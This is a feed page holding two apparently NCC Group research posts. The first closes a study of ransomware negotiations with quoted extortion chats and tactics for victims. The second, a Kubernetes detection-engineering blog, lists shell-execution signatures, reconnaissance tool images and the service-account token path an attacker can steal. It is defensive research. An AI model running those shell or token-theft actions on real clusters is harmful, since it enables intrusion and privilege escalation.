“Thanks Sir. We can pay 750,000 USD in XMR, provided that you will share with me the exact scope, volume, and significance of data that is in your possession. (…) I do stress the data, rather than the decryption key, since I learned about your very positive reputation in providing decryption keys. Looking forward hearing your thoughts. Respectfully, {victim’s name}.”

This example shows that not only should you see the negotiation as a business transaction, but it is also best to leave your emotions outside of the conversation.

2.    Do not be afraid to ask for more time.

Adversaries will usually try to pressure you into making quick decisions. This is often done by threatening to leak documents after a certain amount of time or by threatening to double the ransom. The more stress the adversary can impose on you, the worse your decision making will be. However, in almost all D-second cases the adversary was willing to extend the timer while negotiations were still ongoing. This can be helpful for several reasons. At the beginning of the process, you will need time to assess the situation and rule out any possibility of restoring your data. Similarly, it can give you extra time to develop different strategies. If you decide to pay in the end, you will need to make arrangements to acquire the right cryptocurrency.

Figure 3. A screenshot of a notification showing the ransom demand has been doubled because the timer has run out.

We have seen examples of cases in which the negotiation went on for multiple weeks after the deadline. In the following case the deadline had already passed two days earlier:

Hello, I’m going to be as up front and honest as I can be right now and let you know that we have not been able to secure the 12 million dollars and we also have just now been able to download the data that you took so that we can review it. If at all possible, we need some more time to get together what we can get together to, at the very least, make a reasonable offer. Coming up with the 12 million is almost impossible but if it doubles, there’s no way we will be able to come up with the money. Just a few more days and we should be in a position to give you a realistic and reasonable offer. Any help would be greatly appreciated!

After being asked how much time they needed, the victim responded that they would need at least another week. The adversary agreed to this on the condition that the victim guaranteed a payment of 1 million within 24 hours; otherwise the price would be doubled to 24 million. The victim responded to this by saying:

“I understand that and trust me, we are really trying here. This is exactly why I asked for more time. We have been working all night to gather just the funds to buy more time and we aren’t there. 1 million isn’t going to be possible right now 12 million is definitely going to take more time than 1 million and 24 million just isn’t possible at all really. This is the situation we are in right now. All we’ve asked for is more time and you are going to pass up on a potentially big payday over just giving us a few more days? How much effort would it take on your part just to give us a little more time? You’ve already taken our data and crippled our business. What more effort do you have to put forth to just work with us and give us a few more days. I’ve told you multiple times that we are trying like hell to get this money together from the moment you locked us down. Give us the time and we’ll get whatever we can get together and we’ll continue to communicate with you or don’t give us the time and get nothing. We’ll recover from this or we won’t and you will have put a bunch of people out of work that have been here for their entire careers. This is our livelihoods, this is how we feed our families, this is how we pay our bills. Please try and keep that in mind.

In the end they paid 1.5 million dollars in cryptocurrency. Another way to get more time is by explaining that higher-ups need more time to make decisions, or that you need more time to buy crypto:

“Not to mention it’s the weekend here and the banks or crypto buying sites aren’t open to get anything converted. Your timer runs out tomorrow. Just give us a few more days. We are trying here but we need a little help from you.”

3.    Promise to pay a small amount now or a larger amount later.

Whereas stalling for time can be an effective strategy if you want to prevent your data getting leaked while rebuilding your systems, the following strategy can help in negotiating to settle on a smaller amount. Adversaries also have an incentive to close a deal quickly and move on to their next target. In multiple cases we have seen that the adversary in the D-second database gave large discounts when presented with the option of getting a small amount of money now instead of a large amount of money later. In one case the adversary said the following after an initial demand of 1 million US dollars:

“I spoke to my boss and explained your situation to him. He approved a payment of 350k dollars. There will be no more discounts. Now you are offering 300k dollars, raise your price by 50k and we will close this deal now.”

4.    Convince the adversary you cannot pay the high ransom amount.

One of the most effective strategies is to convince the adversary that your financial position does not allow you to pay the ransom amount that was initially asked. In one example a company was asked to pay 2 million and responded as follows:

“We have discussed this with our management team. We do want the decryptor for our network and for our data to be deleted, but you have asked for a lot of money especially at the end of a difficult year. Can you offer us a lower price?”

They got a 50K discount and ended up paying 1.95 million. Although this seems like a good deal, there are cases in which much less was paid after a more drawn-out negotiation in which the victim was not as willing to pay. Two examples are two companies who both had to pay 1 million, but one ended up paying 350K and the other only 150K. There is also an example of a victim who talked the price down from 12 million to 1.5 million.

These companies achieved this by constantly stressing they could not pay the amount that was asked. One example of this is:

“Our overall revenue has suffered significant impacts in the past year and we are still losing more and more money by the day. Your demand of 12 million dollars is a large portion of our entire revenue for all of last year. You may not know anything about us as a company but we provide a vital service for our clients and this incident has affected not only our business but also many many people and other businesses that rely on us and our services. With all of that being said, we are still willing to pay something to get our data unlocked and not have our client’s information out on the internet for everyone to see. What we can offer you is 1,000,000 USD in bitcoin today to be done with this”.

Later they said:

“(…) With that being said, this payment is out of our own pockets and the million dollars is what we had. We’ve been in discussions all day with our team and we are willing to up our offer to 1,200,000 USD. Work with us here, we are paying for this out of pocket.”

“We’ve looked everywhere and tapped every resource we can tap and taken out every loan we can take out and we’ve been able to come up with another 150k to bring our offer to 1,350,000 USD.”

“We are doing the absolute best we can. With that being said, the owner of the company has agreed to take 50k out of his own pocket to further increase our offer to 1,400,000 USD. That is a hell of a lot of money for anyone and especially us. This is not only affecting our company, it’s affecting PEOPLE real, honest, and hard working people. Basically where we are at right now is that you can take this 1.4 million dollars to make sure that our data doesn’t get released or release the data and it’s worthless from a payment standpoint. There will be no reason at all for us to pay for anything to you once that’s done. We’ll focus our efforts on rebuilding our reputation and rebuilding our business. Please think about the two options here. Thank you for your consideration.”

After this the adversary agreed to the amount of 1.5 million which the victim ended up paying.

Now you might ask yourself: I understand this technique might work for companies who do not have that much money, but what about bigger companies with an obviously larger budget at their disposal? Does the adversary not have access to the financial statements of companies when they get hacked? One of the D-second victims was a Fortune 500 company, who got this response from the adversary after telling them they could pay 2.25 million at most:

“Thank you for your offer but we have a counteroffer. Let me do some pretty important points. The first you are one of Fortune 500 companies with a revenue 16-18 billion, am I right? You produce kind of very important product right now (…) and because online business is booming right now. Back to the numbers we had encrypted 5,000-6,000 of your servers (…). So, if we do same VERY simple calculation. Your expenditures like, let say I don’t know $50 per hour or may me you are even more generous like $65? So, 24 hours spent to restore one server multiply per one encrypted by us server, this is like 10 million dollars in expenditure only on a labour, but don’t forget you spent all this time for installation and OOPS you can’t even restore any data because this is gone for next 1000 year of intensive calculations. The timer it ticking and in in next 8 hours your price tag will go up to 60 million. So, you this are your options first take our generous offer and pay to us $28,750 million US or invest some monies in quantum computing to expedite a decryption process.”

As you can see, the adversary is not very willing to compromise. However, it seems they did not do a deep dive into the financial records of this company. They primarily talk about the servers they hacked. We speculate this might be because the ability to hack companies and the ability to read and dissect complex financial statements do not necessarily overlap. Even if they have access to those files, there is a difference between having a certain amount of revenue and having a couple of million dollars in crypto lying around just for the occasion. In this example the company ended up paying 14.4 million instead of the 28.75 million which was asked initially.

5.    If possible, do not tell anyone you have cyber insurance

Our last negotiation strategy is that you should not mention to the adversary that you have cyber insurance, and preferably also not save any documents related to it on any reachable servers. These are two examples of messages from chats in which the adversary knew the victim had insurance:

“Yes, we can prove you can pay 3M. Contact your insurance company, you paid them money at the beginning of the year and this is their problem. You have protection against cyber extortion. (…) I know that you are now in trouble with profit. We would never ask for such an amount if you did not have insurance.”

“Look, we know about your cyber insurance. Let’s save a lot of time together? You will now offer 3M, and we will agree. I want you to understand, we will not give you a discount below the amount of your insurance. Never. If you want to resolve this situation now, this is a real chance.”

Although a company could still tell the adversary that the insurance company is not willing to pay, this limits the options for any negotiation severely.

Some practical tips during the negotiation

Besides the process-based strategies before and during the negotiation, we also want to give a few tips that apply regardless of your strategy:

  1. The first thing any company should do is try to set up a different means of communication with the adversary; if the adversary does not want to switch, the company should realise the communication is not private. Getting access to these chats is not the most demanding task for technically skilled people. It has happened multiple times that during a negotiation a chat got infiltrated by third parties who started interfering with and disturbing the negotiation.
  2. Always ask for a test file to be decrypted. Although most infamous adversaries have a decent reputation nowadays, you can never be too sure.
  3. Make sure to ask for proof of deletion of the files if you end up paying. There are examples of companies who paid, but whose files are still openly accessible online.
  4. Always prepare for a situation in which your files will still be leaked or sold. Despite what the adversaries may show you, you have absolutely no guarantee that your files got deleted. Especially with RaaS platforms, your system access and files will have gone through many different parties before they reached the final adversary you were negotiating with. Even if they properly deleted your files, who is to say any of the other people in the chain did not quickly make a copy of some interesting files for ‘personal usage’?
  5. Ask for an explanation of how the adversary hacked you. In one case a company received an extensive report from the adversary on how they got access and what the company should do to close any vulnerabilities.

Chat conversation between a victim and D-Second adversary

In this example we see the use of multiple negotiation strategies. The victim asks for more time, and successfully talks the ransom demand down from 13 million to 500K.

“Hello. Can we please get some sample files you took from us? Thank you”
     
     “Hello. we took all files by our filters , round- about 2 TB. What proofs you want see? We will send proofs in 12 hours round about. 100 screenshots from infrastructure and evidence pack of data.”

“Thank you. Would it be possible to also receive a list of files? Thank you”

     “Full file tree will be only able in 1-2 working days, quantity of data is so high. Proof pack of files we already started to prepare. Very soon will be sent. Here you are proof pack of your data, we are interested in to continue dialog with CEO, CFO. We are not interested in to talk with system administrators. Don’t worry we done full dump, files from your network by our smart filters.”

“Hello. Thank you for the sample files. When can we get a file tree?”

     “Full file tree will be able after successful deal. In other case files will go to public & mass media. Proof package where provided already with some samples of documents and screenshot as well. Article able public for all, in 2 days we will start publicate data.”

“We thought we have almost 6 days left. Our leadership is currently reviewing the situation and determining the best resolution.”

     “Until we waiting for your reply on situation. We stopped DDoS attack to your domain, you can switch on your website. As well your blog, where hidden. Nobody will see information about that, until we will not get in deal. We stopped already other instruments which already where processed today.”

“Okay, thank you. We want to cooperate with you. We just need some time during this difficult situation.”

“Hello. We would like to know how you came up with this price for us. It is very high.”

     “Hello. We work on mathematical algorithms for each client price is different depending on their financial situation, sphere of activity and other aspects. In your situation price comes like is it. What price is not so high for you, then we have question.”

“Our industry has been suffering in revenue over the last couple of years and we don't make enough to pay even close to that much. Can you suggest a much lower amount that would satisfy you?”

     “We have been asked before, we doesn’t get answer - on our question - What price is not so high for you ???”

“Can you please tell us what we will receive once payment is made?”

     “You will get: 1) full decrypt of your systems and files 2) full file tree 3) we will delete files witch we taken from you 4) audit of your network
"

“This situation is very difficult for us and we are worried we may get attacked again or pay and you will still post our data. What assurances or proof of file deletion can you give us?”

     “We have reputation and word, we worry about our reputation as well. After successful deal you will get: 1) full file trees of your files 2) after you will confirm we will delete all information and send you as proof video, we are not interested in to give to someone other your own data. We never work like that.”

“Okay, thank you. We are going to have some meetings this weekend with our leadership. We need to assess our available funding and we can get back to you after that with what we can pay. Thank you for your patience.”

     “We wait”

“These leadership meetings are going to take this weekend to complete. It may take until Monday to come up with what we might be able to pay.”

     “OK”

“Hello. We would like to know if you would accept our offer of $300k? Our revenue has been severely impacted as the industry has suffered over the last few years, and we can not pay even close to the amount you have asked. We only hope you can understand our situation. Thank you.”

     “Hello. Thank you for offer, sorry but we can't gave you so big discount. We know that all businesses are impacted by Covid-19, and financial crisis , etc. for Us the situation same. We have different questions to you 1) Your reputation costs 300 000 USD? And customer trust. 2) Costs for lawsuits with GDPR as well will cost nothing? 3) How about investors they already know about the situation? We always go forward to our clients. The legal losses will be much greater on today. In case of successful deal think about better offer, and come back. Time is settled and we will continue our procedures if you don’t take situation serious.”

“We of course understand the severity of the situation and have considered all of these issues, however we are offering what we have available. We are a very small company and do not have much revenue and we are offering what we can. We can try to come up with a little more, but it is not so much. We hope you can work with us as we try to satisfy the needs for both of us. Thank you.”

     “What’s the offer?”

“We will get back to you shortly with a revised offer. Thank you”

“Hello. We would like to know if you would accept $350k? This is a significant amount of money for us at this time. Thank you.”

     “We will never accept such ridiculous amount, make it x10 higher and we will think.”

“Thank you for your patience. Unfortunately the amount you are asking for is not something we are able to provide. We are a small company and do not have the revenue, and our insurance is not enough to help with this. We are able to increase our offer to $425k. Please let us know if you are willing to work with us in this. Thank you.”

     “I said you, you must make your offer x10 higher. If you continue to make your ridiculous steps, we will ignore you.”

     “And don't forget, you have the last 21 hours before price will be doubled and all discounts will be impossible, and sure, post with you sensitive data will be published.”

“Hello. We thank you again for your patience. We are asking for you to take into account the difficult position we are in. We do not have the cash funds available or insurance to pay the amount you are seeking. We are not even able to borrow the money right now. We are only able to offer you a little more money right now and this is the most we can do. We can only pay up to $500k. This is our final offer and are prepared for what will happen if you do not accept. If you accept we will arrange for the payment. Thank you for your consideration.”

     “O.K. Your price is changed to 500 000 USD (in XMR Monero). We are ready for compromise.”

“Okay, thank you very much. Please add some time back to the timer so we can arrange for the funds to be sent. We will start the process right away.”

     “We wait”

“Can you show us proof of ability to decrypt our files?”

     “Of course. Send one file we will decrypt and send it back”

“Hello. We are getting close to finalizing making the payment. We will notify you when it is coming, but we would like to conduct a test transaction first. Please confirm you will provide the following when payment is made: 1) Decryption tool 2) File tree 3) Can you provide a link so we can download all of our files in case there is a problem decrypting them? 4) Proof of file deletion after we download all of the files.”

     “1) decrypt tool you I will get instantly 2) file tree will start make after payment 3) all your files if will be needed we will share by link 4) and video of course. Write after sending money.”

“Great, thank you. Will 2250 xmr be okay? That was the amount we purchased because of the amount shown this morning. Now it shows more. We bought 2250.”

     “OK”

“We are preparing to send a test transaction. Once we confirmed it works we will send the remaining amount. To confirm above mentioned, we will definitely want a link to download the files. Thank you.”

     “Link for downloaded files will take time round - about 1 working day. It`s not so easy how you think. We should prepare it for, you in case if you don`t need full file tree.”

“Okay, thank you”

     “Also, we see your payment. You have to send the rest.”

“Okay we will send the rest now”

     “We can see your payment, after 10 confirmations we will do all that was promised.”

“Thank you”

Conclusion

This empirical research suggests that the ransomware ecosystem has developed into a sophisticated business. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profit. There are a number of well-executed studies focusing on fighting cybercrime and on how adversaries penetrate given targets. However, despite the economics behind this ecosystem being its essential driver, it has often been overlooked. We conclude that there are clear signs that adversaries have adopted price discrimination techniques based on the yearly revenue of their victims. If we look at price setting and negotiation from the adversaries’ point of view, we see that they wield a massive advantage over their victims. Not only do they have the luxury of investigating their victims’ financial statements if they choose to do so, but they also have the advantage of previous experience they can draw on. This can explain the current rise in ransomware infections around the world. Luckily, there are some strategies victims can use to diminish some of the advantages the adversary has, which we have covered extensively in the previous chapters.

Looking to the future of ransomware, it is no longer a question of whether a company is going to get breached, but rather a question of when. We have even heard people go as far as to say that it is almost an insult if your company does not get attacked nowadays, it having become a business badge of honour of sorts. Similarly, as more and more companies become ransomware victims, people are simply becoming tired of hearing about it. If the increase in ransom demands persists and the decrease in public backlash continues, we could see a shift towards companies paying less often, which would be better for society overall. On the other hand, this could also lead to criminals becoming more aggressive in their persuasion tactics, or lowering their ransom demands to an equilibrium.

A bit of hope comes from some recent successes by law enforcement agencies. In November 2021, Romanian authorities arrested multiple individuals suspected of deploying the REvil ransomware on victims’ systems as part of operation GoldDust, in which authorities from 17 countries joined efforts with Europol, Eurojust and Interpol. Similarly, in October 2021, another police cooperation between eight countries led to the arrest of twelve suspects who allegedly were part of a worldwide ransomware network. During this investigation, multiple companies could be warned that ransomware was about to be deployed on their systems, preventing millions of dollars of damages. These cases are perfect examples of how we can tackle this wicked problem. Ransomware groups claim victims in multiple countries and do not care about borders, so the only way to fight them is with coordinated international cooperation between police agencies around the world.

We hope that by sharing this research with the public we can add some fuel for the defending side. We have demonstrated how powerful the adversaries are during the negotiation and, most importantly, have created a safety net for the unlucky victims who have fallen. Let us look back at the hypothetical case we opened with. “We wait”, that was their reply after you told them you needed more time. After the entire investigation was over and all the systems had been restored, it became clear to you that they were not in a hurry. They had been in the company’s systems for three weeks prior to rolling out the ransomware. They had access to all your internal documents, including all finance-related statements. They knew everything about you, and you knew very little about them. They waited because they knew you would pay in the end. But how much did you end up paying? The full 3.5 million, or less? Or did you not end up paying at all? The end of this story will not be told by us, but by the countless cases that will continue to happen in the future. We just hope that the information we have provided will help you make the right decisions for your situation.

Acknowledgement

We would like to express our special thanks to Nikki van der Steuijt, and all the members of Fox-IT threat intelligence team.


✇ NCC Group Research

Detection Engineering for Kubernetes clusters

By: Ben Lister

Written by Ben Lister and Kane Ryans

This blog post details the collaboration between NCC Group’s Detection Engineering team and our Containerisation team in tackling detection engineering for Kubernetes. Additionally, it describes the Detection Engineering team’s more generic methodology around detection engineering for new/emerging technologies and how it was used when developing detections for Kubernetes-based attacks.

Part 1 of this post will offer a background on the basics of Kubernetes for those from Detection Engineering who would like to learn more about K8s, including what logging in Kubernetes looks like and options available for detection engineers in using these logs.

Part 2 of this post offers a background on the basics of Detection Engineering for those from the containerization space who don’t have a background in detection engineering.

Part 3 of this post brings it all together, and is where we’ve made unique contributions. Specifically, it discusses the novel detection rules we have created around how privilege escalation is achieved within a Kubernetes cluster, to better enable security operations teams to monitor security-related events on Kubernetes clusters and thus to help defend them in real-world use.

For those with familiarity with Kubernetes, you may wish to skip forward to our intro to Detection Engineering section here, or to our work on detection engineering for Kubernetes, here

Part 1: Background – Introduction to Kubernetes

Before talking about detections for Kubernetes, this section offers a brief overview of what Kubernetes is, its main components, and how they work together.

What is Kubernetes? 

Kubernetes (commonly stylized as K8s) is an open-source container-orchestration system for automating computer application deployment, scaling, and management. It was originally designed by Google and is now maintained by the Cloud Native Computing Foundation. It aims to provide a "platform for automating deployment, scaling, and operations of Container workloads". It works with a range of container tools and runs containers in a cluster, often with images built using Docker. [1]

Figure 1: A typical cluster diagram. More information on the components can be found here

At a high level, the cluster can be divided into two segments, the control plane and the worker nodes. The control plane is built up of the components that manage the cluster such as the API server, and it is this control plane where we focused our detection efforts which will be discussed later on.

Whilst we’re discussing the various components of a cluster, it is important to quickly note how authentication and authorization are handled. Kubernetes uses roles to determine if a user or pod is authorized to make a specific connection/call. Roles are scoped to either the entire cluster (ClusterRole) or a particular namespace (Role).

A role declares a list of resources (the objects) it grants access to, and a list of verbs it is allowed to perform on those resources. Roles are then attached to RoleBindings, which link the role (the permissions) with users and systems. More information on this functionality can be found here in the Kubernetes official documentation.

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: default
  name: pod-reader
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "watch", "list"]

Figure 2: Example of a policy configuration taken from the Kubernetes documentation

The above Role, once attached via a RoleBinding, allows the bound users or systems to retrieve information on pod resources located in the default namespace of the cluster.
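
For completeness, a RoleBinding that attaches such a pod-reader Role to a user might look like the following sketch, adapted from the Kubernetes documentation (the user name “jane” and binding name are placeholders, not values from this post):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
# "jane" is a placeholder user for illustration
- kind: User
  name: jane
  apiGroup: rbac.authorization.k8s.io
roleRef:
  # The Role being granted; must live in the same namespace
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
```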

Why use Kubernetes?

Kubernetes provides the capability to scale up horizontally as opposed to scaling vertically, i.e., spreading the workload by adding more nodes instead of adding more resources to existing nodes.

Kubernetes is an enticing proposition for many companies because it provides them with the ability to document configurations, disperse applications across multiple servers, and configure auto-scaling based on current demand.

Kubernetes Logging

Detection engineers are only as good as their data. That is why finding reliable and consistent logs is the first problem that needs solving when approaching a new technology for detection engineering.

This problem is made harder because there are multiple ways of hosting Kubernetes environments, such as managed platforms like Azure Kubernetes Service (AKS), Amazon Elastic Kubernetes Service (EKS) and Google Kubernetes Engine (GKE), as well as natively running Kubernetes as an unmanaged solution.

Ultimately, we decided to utilise API server audit logs. These logs provide a good insight into what is going on inside the cluster, due to the nature of the API server. In normal operation, every request to make a change on the Kubernetes cluster goes through the API server. It is also the only log source consistent among all platforms.

However, there are some issues with using these logs. Firstly, they need to be enabled; the audit policy detailed here is a good starting point and is what we used in our testing environments. Some managed platforms will not let you customise the audit logging, but it still needs to be enabled. From a security perspective, certain misconfigurations, such as unauthenticated access to Kubelets, would allow an attacker to bypass the API server entirely, rendering these logs, and therefore all our detections, ineffective.

It is important to note that audit logs will tell you everything that is happening from an orchestration perspective (pods being deployed, configuration changes, users being added, etc.), not what is happening inside the containers, which in some cases tends to be where the initial compromise occurs.

An audit policy that is too broad can easily generate a lot of irrelevant events, so the configuration should be tested to ensure ingestion of these events stays within acceptable limits.
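
As a rough starting point, a minimal audit policy that captures pod requests in full while keeping everything else at the lighter Metadata level might look like the following sketch (the rule levels and resource selection are illustrative, not a recommendation):

```yaml
apiVersion: audit.k8s.io/v1
kind: Policy
# Skip the noisy RequestReceived stage entirely
omitStages:
  - "RequestReceived"
rules:
  # Log pod requests at Request level so requestObject is captured
  - level: Request
    resources:
      - group: ""
        resources: ["pods"]
  # Everything else at Metadata level to keep event volume manageable
  - level: Metadata
```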

{
  "kind": "Event",
  "apiVersion": "audit.k8s.io/v1",
  "level": "Request",
  "auditID": "bd93fded-1f5a-4046-a37c-82d8909b2a80",
  "stage": "ResponseComplete",
  "requestURI": "/api/v1/namespaces/default/pods/nginx-deployment-75ffc6d4d-nt8j4/exec?command=%2Fbin%2Fbash&container=nginx&stdin=true&stdout=true&tty=true",
  "verb": "create",
  "user": {
    "username": "kubernetes-admin",
    "groups": [
      "system:masters",
      "system:authenticated"
    ]
  },
  "sourceIPs": [
    "<removed>"
  ],
  "userAgent": "kubectl/v1.21.2 (darwin/amd64) kubernetes/092fbfb",
  "objectRef": {
    "resource": "pods",
    "namespace": "default",
    "name": "nginx-deployment-75ffc6d4d-nt8j4",
    "apiVersion": "v1",
    "subresource": "exec"
  },
  "responseStatus": {
    "metadata": {},
    "code": 101
  },
  "requestReceivedTimestamp": "2021-10-21T08:39:05.495048Z",
  "stageTimestamp": "2021-10-21T08:39:08.570472Z",
  "annotations": {
    "authorization.k8s.io/decision": "allow",
    "authorization.k8s.io/reason": ""
  }
}

Figure 3: A sample of an audit log

Part 2: Background – Detection Engineering Approach

This next section is to give some background around our approach to detection engineering and is not specific to Kubernetes. If you are just here for the Kubernetes content, feel free to skip it and the rest of the blog will still be understandable.

When approaching a problem, it can be helpful to break it down into simpler steps. In detection engineering we do this by splitting our detections into categories. Looking at the problem through the lens of each category helps create a well-balanced strategy that incorporates the different types of detection. There are three distinct categories, each with its own strengths and weaknesses, but all contributing to an overall detection strategy: signatures, behaviours, and anomalies.

Signatures

Signatures are the simplest category. It includes detections that are predominately string matching and the use of known Indicators of Compromise (IoCs). They are simple to create and so can be produced quickly and easily. They are usually targeted at a single technique or procedure, so they produce low numbers of false positives and are easy for a SOC analyst to understand. However, they are usually trivial to bypass and should not be relied upon as the sole type of detection. Nonetheless, signatures are the first level of detection and allow for broad coverage over many techniques.

Behaviours

Behavioural analytics are more robust than signatures. They are based on breaking a technique down to its core foundations and building detections around those. They usually rely on more immutable data sources, ones that cannot be changed without changing the behaviour of the technique itself. While the quality of the detection itself is usually higher, the quality of the alert is comparatively worse than for signature-based analytics: they will likely produce more false positives, and it can be harder to understand exactly why an alert was produced, due to the more abstract nature of the analytics and the need for a more in-depth understanding of the technique being detected.

Anomalies

Anomaly analytics are any detections where "normal" behaviour is defined and anything outside of normal is alerted on. These kinds of analytics do not necessarily detect anything malicious, but rather anything significantly different enough to be worth further investigation. A single anomaly-based detection can be effective against a wide range of different techniques. However, their performance can be harder to evaluate than that of signatures and behavioural detections, as it may differ significantly depending on the environment. This can be mitigated somewhat by calculating thresholds from historical data, so that the thresholds are tailored to each environment.

Understanding your advantage

The other concept that is useful when approaching detection engineering is "knowing where we can win". This is the idea that for any given environment/system/technology there will be areas where defenders have a natural advantage. This may be because the logging is better, the attacker is forced into doing something, or there is a limited number of options for an attacker. For example, in a Windows Environment the defender has an advantage when detecting lateral movement. This is because there is twice as much logging (logs can be available on both the source and destination host), there is a smaller number of techniques available compared to other tactics such as execution and an attacker will usually have to move laterally at some point to achieve their goals.

Part 3: Kubernetes Detections

Through our collaboration with NCC Group’s Containerisation team, we identified several use cases that needed detection. The main area on which we decided to focus our efforts was around how privilege escalation is achieved within the cluster. The two main ways this is done is abusing privileges of an existing account or creating a pod to attempt privilege escalation. All our detections are based on events generated by audit logs. For brevity, only a subset of our detections will be described in this blog.

Signatures

The audit logs are a useful source for signature-based detection, since they provide valuable information, such as request URIs, user-agents and image names where applicable. These fields in the data can be matched against lists of known suspicious and malicious strings. These lists can then be easily updated, for example, adding new signatures and removing older signatures based on their effectiveness.

Interactive Command Execution in RequestURI

For certain requests the requestURI field within an audit log contains the command being executed, and the namespace and pod the command is being applied to. This can be used to identify when a command shell is being used and may indicate further suspicious behaviour if unauthorized.

A full example of how this might look in an audit log can be seen in figure 3 earlier in the blog. Some examples of signatures that are useful to search for in the requestURI field are:

  • %2Fbin%2Fbash
  • %2Fbin%2Fsh
  • %2Fbin%2Fash
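
As an illustration only, a check along these lines can be sketched in Python; the URL decoding and field shape follow the audit log sample in figure 3, and the signature list mirrors the bullets above. This is a sketch, not production detection logic:

```python
from urllib.parse import unquote

# URL-decoded forms of the shell signatures listed above
SHELL_SIGNATURES = ["/bin/bash", "/bin/sh", "/bin/ash"]

def is_interactive_shell(request_uri: str) -> bool:
    """Return True if the decoded requestURI contains a known shell signature."""
    decoded = unquote(request_uri)
    return any(sig in decoded for sig in SHELL_SIGNATURES)

# requestURI taken from the audit log sample in figure 3
uri = ("/api/v1/namespaces/default/pods/nginx-deployment-75ffc6d4d-nt8j4/"
       "exec?command=%2Fbin%2Fbash&container=nginx&stdin=true&stdout=true&tty=true")
print(is_interactive_shell(uri))  # True
```

In practice the same string matching would be expressed as a search in your SIEM over the requestURI field rather than in application code.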

User-Agent

The user-agent is an HTTP header that provides meta-information about the operating system and application performing the request. In some cases, it can also be used to identify certain tooling making requests.

One example of using this field for signature-based detection is looking for user-agents containing "access_matrix". Any occurrence of this signifies the use of an access review tool called Rakkess. This tool is a kubectl plugin and might be expected in, say, a dev or staging cluster; unexpected use may be indicative of an attacker performing post-compromise actions.

  "userAgent": "kubectl-access_matrix/v0.0.0 (darwin/amd64) kubernetes/$Format"

Another example might be the use of cURL or HTTP request libraries, which may indicate post-exploit actions, especially when not previously seen in the environment. It is important to note that the user-agent can be modified by the source, so this type of detection is trivial to bypass.

Image

This field includes the name of the image to be deployed and the registry from which it came. Various security and reconnaissance tools are distributed as container images; they all have legitimate use cases, but any unauthorized use of them on a Kubernetes cluster should be alerted on and investigated further.

Some examples of such images include, but are not limited to:

  • cyberark/kubiscan 
  • aquasec/kubehunter
  • cloudsecguy/kubestriker
  • corneliusweig/rakkess 

The image field could also be utilised to detect when pods are being deployed for crypto-mining purposes. Running crypto miners after compromising a cluster is a commonly seen tactic and any known crypto mining images should also be added as a signature for known bad container images.

Behaviours

Anonymous User Logon

In any system, a user performing actions without authenticating is usually a bad thing. Kubernetes is no different, and there have been some high-profile incidents where the initial access was an API server exposed to the internet that allowed unauthenticated access. The first line of defence is to mitigate the attack by disabling unauthenticated access, which can be done with the --anonymous-auth=false flag when starting a kubelet or the API server.

As an additional layer of defence, any request to the API server where the user field is system:anonymous or system:unauthenticated should also be alerted on.

Service Account Compromise

Kubernetes pods run under the context of a service account. Service accounts are a type of user account created by Kubernetes and used by the Kubernetes systems. They differ from standard user accounts in that their usernames are prefixed with “system:serviceaccount:” and they usually follow well-defined behaviours. To authenticate as a service account, every pod stores a bearer token in /var/run/secrets/kubernetes.io/serviceaccount/token, which allows the pod to make requests to the API server. However, if the pod is compromised by an adversary, they will have access to this token and will be able to authenticate as the service account, potentially leading to an escalation of privileges.

Detecting this type of compromise can be difficult, as we won’t necessarily be able to differentiate between normal service account usage and the attacker using the account. However, the advantage we have is that service accounts have well-defined behaviour. A service account should never send a request to the API server that it isn’t authorised to make. Additionally, a service account should never have to check its own permissions. Both actions are more indicative of a human using the service account than of the system. Therefore, any denied request from a user whose name starts with “system:serviceaccount:”, and any request from such a user where the resource field contains “selfsubjectaccessreview”, should be alerted on.
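
A sketch of this rule in Python, keyed off the audit event fields shown in figure 3 (the “forbid” decision value and the exact field paths are assumptions based on that sample format and may need adjusting for your environment):

```python
def suspicious_service_account(event: dict) -> bool:
    """Flag audit events where a service account is denied a request or
    reviews its own permissions; both are more typical of a human driving
    a stolen token than of normal workload behaviour."""
    username = event.get("user", {}).get("username", "")
    if not username.startswith("system:serviceaccount:"):
        return False
    # Authorization outcome is recorded in the audit annotations
    denied = event.get("annotations", {}).get(
        "authorization.k8s.io/decision") == "forbid"
    # Self-permission checks go through the selfsubjectaccessreviews resource
    self_review = "selfsubjectaccessreview" in event.get(
        "objectRef", {}).get("resource", "").lower()
    return denied or self_review
```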

Other Notable Behaviours

The major behaviour we have not gone into detail in this post is how Kubernetes handles Role-Based Access Control (RBAC). RBAC is a complex topic in Kubernetes and warrants its own blog post to go into all the different ways it can be abused. However, in any system it is worth alerting on high privilege permissions being assigned to users and this should be handled in any Kubernetes detections as well.

A ‘short-lived disposable container’ is another pattern that can indicate malicious behaviour. Shell access to a container configured with tty set to true and a restart policy set to Never is highly suspicious on an operational cluster. It is unlikely there is a genuine need for this, and it could indicate an attacker trying to cover their tracks.
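
A minimal check for this pattern might look like the following sketch, assuming the pod manifest is available under requestObject.spec in the audit event (field paths follow the standard Pod manifest structure):

```python
def disposable_interactive_pod(event: dict) -> bool:
    """Flag pod creations configured as short-lived interactive containers:
    any container with tty enabled combined with restartPolicy Never."""
    spec = event.get("requestObject", {}).get("spec", {})
    tty_enabled = any(c.get("tty") for c in spec.get("containers", []))
    return tty_enabled and spec.get("restartPolicy") == "Never"
```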

Finally, the source IP is present in all audit log events. Any request outside of expected IP ranges should be alerted on, particularly for public IP ranges as this may indicate that the API server has been accidentally exposed to the internet.

Anomalies

One of the questions we asked ourselves was “How do we know when a pod has been created for malicious purposes?”. There are multiple ways a pod could be configured to allow some form of privilege escalation. However, each of these configurations has a legitimate use case, and it is only when they are used in a way that deviates from normal behaviour that they become suspicious.

In order to create detections for this, the following assumption was made: pods created by a single organisation will follow similar patterns in their configuration, and deviations from these patterns will include suspicious pods that are worth putting in front of an analyst to investigate further.

Anomaly detection by Clustering

To do this we used a technique called clustering. This blog will not go into the details of exactly how the clustering works; some SIEMs, such as Splunk, have built-in functions that allow this kind of processing to be done with minimal effort. Clustering involves taking multiple features of an object, in this case the configuration of the pod, and grouping the objects so that objects with similar features end up in the same group. The easiest way of describing clustering, and how we can use it to find anomalies, is by visualising it.

